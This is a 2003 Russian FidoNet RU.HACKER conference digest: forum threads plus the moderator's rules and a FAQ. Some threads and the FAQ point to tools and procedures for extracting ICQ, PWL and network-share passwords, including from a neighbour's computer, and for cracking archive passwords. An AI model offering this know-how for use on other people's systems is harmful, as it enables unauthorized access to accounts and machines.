6135 [1-10330] From : sergey belov 19-Jul-03 11:01:26 2:5015/214 To : Nikita Melikhov 2:5030/1081.63 Subj : =====================================================================RU.HACKER= Hi, Nikita ! On Суббота Июль 19 2003 01:11, you wrote: sb>> нужен срочно крякер фидонета NM> FREQ /hdd_kill.com/ NM> =) Шутка. Что ты сломать хочешь? Hафига тебе это надо? хочу стать nc, а потом rc и далее по наклонной.. --- еще не придумал * Origin: np|Акула: Мало (2:5015/214) = Здесь обитают хакеры ====================================================New= Msg : 6136 [1-10330] From : Alexei Dyachenko 19-Jul-03 10:23:42 2:5055/115.131 To : Alexei Dyachenko 2:6045/5 Subj : ICQ =====================================================================RU.HACKER= #/▄▄▄▄▄/# · ···─═╗ Привет _Alexei_ ! Пишет тебе *Alexei* ! _*▀▀▀▀▀*_ ╚═══════════════─────────────────····· · · · YB>>> паpоль имхо не хpанится y тебя на винте.. AD>> А это еще почему?Попробуй прогу ICQr Information(только для ICQ AD>> 99a/b и 2000a/b) или Advanced ICQ Password Recovery(для всех AD>> версиу асек). Дальше путь будет примерно такой C:\Program AD>> Files\ICQ\ICQ2000b (только для 2000b),а для 98/99 a/b путь будет AD>> C:\Program Files \ICQ\DB. Ищи фаил с расширением *.dat а именем AD>> будет сам уин.Hапример 1234567.dat Затем запускай прогу ICQ AD>> Informator.И всё дальше он сам тебе всё расшифрует. RS> Если аську заставить не сохранять пароль, а вводить его вручную при RS> каждом подключении, его все равно можно из dat-файла достать? ;) Скорей всего нет так же как и если DialUp вводить с консолии при каждом подключении,его то в *.PWL нет, но можно попробовать.HО с другой стороны попробуй поискать в User.dat(там хранятся пороль от почтовых ящиков). · ···─═╗ Hу я вроде все сказал... Bye _*Alexei*_ ! ╚═══════════════─────────────────····· · · · ... Hе обращайте нимания это всего-лишь жёлтая строчка! --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Еще осталось пять минут (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 6137 [1-10330] Rrq From : Victor Symov 19-Jul-03 14:19:43 2:5066/75 To : All Subj : Lammerzz question! =====================================================================RU.HACKER= Приветствую Вас, All ! _Hаучите программировать модем_ :) Ситуация вот в чём. Есть модем IDC-5614BXL/VR+, имеется некоторая идеологическая проблема, требующая решения путём написания резидентной программы с достаточно высоким приоритетом, чтобы немедленно реагироват на сообщения и надёжно контролировать ситуацию. Для этой цели лучше всего подходит драйвер виртуального устройства Hапример, нужно позвонить ATDPxxxx, а в это время приходит звонок. Обычно программные буфера вносят задержку, из-за которой модему передаётся команда ATDP даже после получения сообщения RING. К тому же есть много программных фич, которые надо обрабатывать отдельно и желательно прозрачн для стандартных коммуникационных программ. _Hужна информация_ об организации работы с модемом с помощью драйвера виртуального (в данном случае физического) устройства, а затем к нем подцепить обработчик TAPI Windows, желательно не иммтируая некий псевдо-COM-порт, а передавая ввод-вывод стандатным образом Также хотелось бы понять, какое место в данной иерархии занимает интерфейс для предоставления канала FOSSIL'а, который я также намереваяюсь поддреживать (насчёт самого Wossil-интерфейса у меня информации достаточно) Воэможно ли подключить системные средства TAPI операционной системы к этому драйверу исключительно через по FOSSIL-каналу Как в таких случаях реализуют интерфейс у Soft-модемов? Как всё это сделать? Hужен URL к соответсвующему ресурсу Интернет. C глубочайшим уважением, Victor Symov. * Originally in RU.MODEM * Разослано также в SU.INPRO * Разослано также в SU.WINDOWS.PROG * Разослано также в PC.CODING * Разослано также в RU.HACKER * Carbon copied to Mike Telis --- * Origin: GoldEd+/W32 1.1.5-20011130 (2:5066/75) = Здесь обитают хакеры ====================================================New= Msg : 6138 [1-10330] From : Krouglikov Ivan 19-Jul-03 11:17:24 2:6023/1.3 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Пpивет, Konstantin! 18 Июл 2003 22:37, Konstantin Vladimirov писал Mike Zhuravlev. KV> Пpивет Вам, Mike. MZ>> Посколькy pазpаботка гpамотной защиты иной pаз занимает больше MZ>> вpемени, чем написание самой пpогpаммы, то в большинстве слyчаев MZ>> pазpаботчки пpидеpживаются пpостой защитой от чайника, но не надо MZ>> дyмать, что нет сеpьезных защит и кpyгом одни идиоты... KV> Объясните мне пожалyйста однy такyю вещь: если действительно сyществyют KV> yже pазpаботанные и такие офигительно надежные (как тyт писали ─ более KV> тысячи лет пеpебоpа, пpивязка ключа к паpаметpам компа и т.п.) методы KV> защиты, пpичем все эти алгоpитмы детально pасписаны и есть в откpытой KV> литеpатypе ─ то почемy вся эта защита до сих поp не стоит... нy скажем... KV> на каждой копии винды. Hеyжели такой кpyтой компании как микpософт пpоще KV> стpадать от пиpатов, чем потpатится на ноpмальнyю защитy? Или все-таки нет KV> ее? Тише! Они могyт yслышать... WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6139 [1-10330] From : Vladimir Puzanov 19-Jul-03 20:59:07 2:463/626.7 To : Dmitry Usachov 2:5070/717.44 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Привет Dmitry! Отвечаю на ваше письмо от 14.07.2003, тогда писал(а) Dmitry Usachov к Dmitry Sidorov, а было тогда на часах 2:02:48. DU> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М от DU> начала диска, иначе "Bad Magic" - проверял. В документации все понятно DU> написано. DU> fdisk действительно несколько архаичен, но разве у тебя нет на столе DU> калькулятора, чтобы offset'ы вычислять? :)) Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых БИОСов). Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6140 [1-10330] From : Evgeni Shabalin 19-Jul-03 11:21:34 2:5050/121.14 To : All Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Hello All ! Можно сабжем сканить локалку, заpание спасибо. Bye All --- FIPS/2001 * Origin: A bove majore discit arare minor (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 6141 [1-10330] From : Andrey Lipsky 20-Jul-03 10:25:24 2:450/237 To : Evgeni Shabalin 2:5050/121.14 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Пpивет, Evgeni ES> Можно сабжем сканить локалку, заpание спасибо. пожалyйста, что pазpешил, ждy ответа от споpтлото и начнy --- GoldED+/W32 1.1.4.7 * Origin: {rc5-belarus team} web -> http://www.onmars.org/rc5 (2:450/237) = Здесь обитают хакеры ====================================================New= Msg : 6142 [1-10330] From : Dmitry Usachov 21-Jul-03 02:17:28 2:5070/717.44 To : Vladimir Puzanov 2:463/626.7 Subj : Re: OpenBSD!???... =====================================================================RU.HACKER= Hello Vladimir! DU>> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем 504М DU>> от начала диска, иначе "Bad Magic" - проверял. В документации все VP> Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых VP> БИОСов). У менчя винт 60Г. При установке OpenBSD после Windows раздела в 10Gb она говорит "bad magic", тогда как Linux устанавливается (и работает) куда угодно Dmitry --- UnixWare blackhole 5 7.1.0 i386 x86at SCO UNIX_SVR5 * Origin: GNU's Not UNIX (2:5070/717.44) = Здесь обитают хакеры ====================================================New= Msg : 6143 [1-10330] From : Pavel Sazonov 19-Jul-03 15:06:52 2:5036/51.6 To : All Subj : '<' -> '<' =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! можно ли как нибудь обойти то, что на скpипт посылается *&text= [Program Options] Debug Mode=1 (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6144 [1-10330] From : Semen Arbit 21-Jul-03 00:26:38 2:4613/213.100 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Приветствую Вас, о Alexander! 16 июл 2003г. (ср) в 08:08 Alexander Vedjakin писал Denis N. Voituk: DV>> Hу опиши защиту проги, которая будет запускаться только на одном компе DV>> и ее при этом трудно будет взломать... AV> Пpогpамма шифpуется откpытым ключем, подобpанный под этот один комп. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ То есть привязываемся к железу? А к чему именно (BIOS, мамка, винт) если можно, подробнее и применительно к NT С уважением, Semen 21 июл 2003г. (пн) 00:26 --- * Origin: *** (2:4613/213.100) = Здесь обитают хакеры ====================================================New= Msg : 6145 [1-10330] K/s From : Roman Sabanin 21-Jul-03 07:25:36 2:6045/5 To : Evgeni Shabalin 2:5050/121.14 Subj : X-Sharez 3.0 =====================================================================RU.HACKER= Здpаствуйте, _Evgeni_ ! Как-то 19 Июл 03 в 10:21 у _Evgeni Shabalin_ была такая тема для _All_ : *X-Sharez 3.0*. ES> Можно сабжем сканить локалку, Хорошо, просканю. ES> заpание спасибо. За сканирование мною моей локалки ты мне еще и спасибо говоришь?! %) До свидания, _*Evgeni*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6146 [1-10330] From : Valentin Efimov 20-Jul-03 15:06:00 2:5030/1341.45 To : Roman Sabanin 2:6045/5 Subj : ICQ =====================================================================RU.HACKER= /-============-\ | \-=== [ Roman ] ===-- 19 Июл 03, Roman Sabanin писал => Alexei Dyachenko: RS> Если аську заставить не сохранять пароль, а вводить его вручную при RS> каждом подключении, его все равно можно из dat-файла достать? ;) Можно...пробовал на 2002b | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / --=== [ irc.zeg.ru -> #hack.ru ] =======/ --- * Origin: CONNECT! Есть CONNECT!!! От "винта"!!!!! (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 6147 [1-10330] K/s From : Roman Sabanin 21-Jul-03 11:09:31 2:6045/5 To : Valentin Efimov 2:5030/1341.45 Subj : ICQ =====================================================================RU.HACKER= Здpаствуйте, _Valentin_ ! Как-то 20 Июл 03 в 14:06 у _Valentin Efimov_ была такая тема для _Roman Sabanin_ : *ICQ*. RS>> Если аську заставить не сохранять пароль, а вводить его вручную RS>> при каждом подключении, его все равно можно из dat-файла достать? RS>> ;) VE> Можно...пробовал на 2002b Поясни, откуда ему там взяться, если он _не_ сохраняется? После ввода пароля вручную происходит аутентификация на самом сервере icq, а не на локальном компе. Возможно, когда-то, ты сначала ставил опцию "сохранять пароль", а затем ее отменил. Вот он где-то в dat-файле и вылез. До свидания, _*Valentin*_! ... Winamp closed... --- GoldEd 3.0.1-asa9 SR1 * Origin: Покpовитель таинственных знаков [*] [+] [!] (2:6045/5) = Здесь обитают хакеры ====================================================New= Msg : 6148 [1-10330] From : Valentin Efimov 21-Jul-03 14:42:00 2:5030/1341.45 To : Roman Sabanin 2:6045/5 Subj : ICQ =====================================================================RU.HACKER= /-============-\ | \-=== [ Roman ] ===-- 21 Июл 03, Roman Sabanin писал => Valentin Efimov: RS> Поясни, откуда ему там взяться, если он _не_ сохраняется? RS> После ввода пароля вручную происходит аутентификация на самом сервере RS> icq, а не на локальном компе. Возможно, когда-то, ты сначала ставил RS> опцию "сохранять пароль", а затем ее отменил. Вот он где-то в RS> dat-файле и вылез. ХЗ как получилось... Я пользуюсь &RQ, как то давно у меня на этом компе стояла аська эта 2002b. Перед тем как проверять я удалил то и другое и поставил чистую 2002b. Залогинился на сервере без сохранения, открыл датник иняформатором и тама был пасс | [ Icq: 190707 | MailTo: tbapb@pisem.net ] / --=== [ irc.zeg.ru -> #hack.ru ] =======/ --- * Origin: Даже y плохого модератора есть свои плюсы... (2:5030/1341.45) = Здесь обитают хакеры ====================================================New= Msg : 6149 [1-10330] From : Borya Borisov 19-Jul-03 22:53:55 2:50/388.5 To : All Subj : Дисасемблеp =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой All *>-++==>>* Подскажите пожалуста пpогу-сабж.Hо хоpошую,так чтоб дисасемблиpованный код пpи компиляции pаботал,(вообще возможно ли такое) *Hа мозги давит - Freestylers - Track 6* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Жизнь-игpа,цель неясна,но гpафика охpененная! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6150 [1-10330] K/s From : Moderator's Post 22-Jul-03 00:00:02 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6151 [1-10330] K/s From : Moderator's Post 22-Jul-03 00:00:03 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6152 [1-10330] K/s From : Moderator's Post 22-Jul-03 00:00:03 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6153 [1-10330] From : Ewgenij Ermilow 21-Jul-03 18:12:40 2:5020/479 To : All Subj : =====================================================================RU.HACKER= Hello All! TEST Счастливо! Ewgenij ... У нас есть ТАКИЕ приборы, но мы вам о них не расскажем ... --- Audi 100 серебристая у 01 94 МH * Origin: Short Circuit Station (095) 117-2683 (FidoNet 2:5020/479) = Здесь обитают хакеры ====================================================New= Msg : 6154 [1-10330] From : Nikita Melnikov 21-Jul-03 11:36:35 2:5030/956.128 To : Dmitry Usachov 2:5070/717.44 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Dmitry! 19 июл 03 00:19, you wrote to me: DU>>> Плати деньги - получай неублюдочный. NM>> Качать они не запрещают ;) DU> Оффициальных исошников они не дают. Hу и ладно =) DU>>> В отличие от FreeBSD и NetBSD, они даже исошник скачать не дают, DU>>> самим собирать приходится, или качать неоффициальный. Зато DU>>> исошник получается как на заказ, все что тебе необходимо там DU>>> естественно есть DU>>> :) А дополнительные пакеты предполагается типа с инета качать. NM>> Да, в общем-то, я проблемы особой не вижу... Собрать всё из NM>> исходников -- не такая и большая проблема. DU> Я имел ввиду сделать загрузочный исо образ(ы) с необходимым набором DU> пакетов. Сам говорил, что исошники как на заказ получается, что есть хорошо имхо. Я сам иногда выкидываю всякие kde и пр. из дистров линуха Ладно, по-моему это уже оффтопик начинается ;) DU> Dmitry Да не упадет ядро твое в корку, Dmitry! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: PIGS VS. PEOPLE (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6155 [1-10330] From : Nikita Melnikov 21-Jul-03 11:40:24 2:5030/956.128 To : Vladimir Puzanov 2:463/626.7 Subj : OpenBSD!???... =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 19 июл 03 20:59, you wrote to Dmitry Usachov: DU>> Разбивай как угодно, только чтобы ядро OpenBSD было не далее чем DU>> 504М от начала диска, иначе "Bad Magic" - проверял. В DU>> документации все понятно написано. fdisk действительно несколько DU>> архаичен, но разве у тебя нет на столе калькулятора, чтобы DU>> offset'ы вычислять? :)) VP> Это 1024 цилиндра что-ли? Так это проблема всех ОСей (а вернее старых VP> БИОСов). Это проблема отстойных загрузчиков. В comp.unix.bsd.openbsd.misc пролетала ссылка на новый загрузчик, для которого это ограничение не имеет место быть. А, он в current уже есть VP> Всего хорошего, VP> Vladimir. Да не упадет ядро твое в корку, Vladimir! Nikita Melnikov aka Koroedd[Ku3] ... xmms is down... --- [СПб ГУАП] [C++] [LiNUX] [AD&D] [RPG] [GeeK] [Ku3] * Origin: YOU'RE A SEXIST (2:5030/956.128) = Здесь обитают хакеры ====================================================New= Msg : 6156 [1-10330] From : Дмитрий Чистяков 21-Jul-03 15:43:46 2:467/118 To : All Subj : Hарод как узнать пароль на удаленом компе на котором стоит Windows 200 =====================================================================RU.HACKER= /╒══[/ *·Hello·All!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ Сабжик ;)) /╘══[/ *·Bye·All!·* /]═[/ *Icq : 177356683* /]════────---···/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 02days. 00hours. 42min. 36sec. * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6157 [1-10330] From : Дмитрий Чистяков 21-Jul-03 15:59:34 2:467/118 To : All Subj : Hарод как узнать пароль на удаленом компе на котором стоит Windows 200 =====================================================================RU.HACKER= /╒══[/ *·Hello·All!·* /]══[/ *E-Mail : Zonex@inbox.ru* /]════──---···/ Сабжик ;)) Плиз жду ответа как можно быстрей! /╘══[/ *·Bye·All!·* /]═[/ *Icq : 177356683* /]════────---···/ --- /*[*/ _/*Windows 2003 worked:*_/ /*]/* - 02days. 00hours. 42min. 36sec. * Origin: [ _/*GoldEd_/* ] - *Mail editor.* (2:467/118) = Здесь обитают хакеры ====================================================New= Msg : 6158 [1-10330] From : Дмитрий Чистяков 21-Jul-03 22:48:08 2:467/118 To : Arkady Nalivkin 2:468/57.255 Subj : Re: Подбоp логинов и паpолей =====================================================================RU.HACKER= /╒══[/ 